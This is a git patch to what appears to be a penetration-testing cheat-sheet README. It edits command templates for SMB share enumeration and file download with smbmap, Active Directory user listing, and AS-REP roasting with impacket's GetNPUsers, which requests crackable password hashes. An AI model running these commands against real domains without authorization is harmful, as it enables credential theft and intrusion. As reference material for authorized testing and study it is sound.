From 66be963dd3a8903b45a17cef14868a72bcbe9861 Mon Sep 17 00:00:00 2001
From: Joe Totes <59018247+Totes5706@users.noreply.github.com>
Date: Tue, 6 Sep 2022 10:32:16 -0400
Subject: [PATCH] Update README.md

---
 README.md | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/README.md b/README.md
index ef5b6eb..7332cbd 100644
--- a/README.md
+++ b/README.md
@@ -486,7 +486,7 @@ ldapsearch -H ldap://{IP ADDRESS} -x -b "{DC NAMING CONTEXT}" '(objectClass=Pers
 smbmap -H {IP ADDRESS}  
 
 # Recursively show all readable files and shares
-smbmap -R {SHARE} -H {IP ADDRESS} 
+smbmap -R {SHARE} -H {IP ADDRESS} --depth 10
 
 # Download a file with smbmap
 smbmap -R {SHARE} -H {IP ADDRESS} -A {FILE} -q 
@@ -663,10 +663,13 @@ net user {USERNAME} /domain
 # Enumerate all groups in domain
 net group /domain
 
-# ASREP ROAST
-python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
+# Get Active Directory Users
+python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all {DOMAIN}/{USERNAME}:{PASSWORD} -dc-ip {IP ADDRESS}
 
-python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1}.{DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
+# ASREP ROAST
+python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py -request {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -format john
+
+python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py {DOMAIN1.DOMAIN2}/ -dc-ip {IP ADDRESS} -usersfile {USER.txt} -format john
 
 # Bloodhound
 sudo neo4j console                          # LHOST